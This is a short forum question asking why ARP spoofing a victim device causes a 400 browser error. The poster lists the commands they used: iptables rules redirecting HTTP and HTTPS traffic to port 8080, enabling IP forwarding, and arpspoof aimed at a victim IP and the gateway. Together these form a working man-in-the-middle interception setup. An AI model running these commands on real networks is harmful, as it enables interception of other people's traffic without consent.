Answer the question
In order to leave comments, you need to log in
Why does arp spoofing on a victim device result in a 400 error in the browser?
iptables -t nat -A PREROUTING -p tcp —destination-port 80 -j REDIRECT —to-port 8080
iptables -t nat -A PREROUTING -p tcp —destination-port 443 -j REDIRECT —to-port 8080
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlp2s0f0 -t 192.168.43.230 192.168.43.1
Answer the question
In order to leave comments, you need to log in
Didn't find what you were looking for?
Ask your questionAsk a Question
731 491 924 answers to any question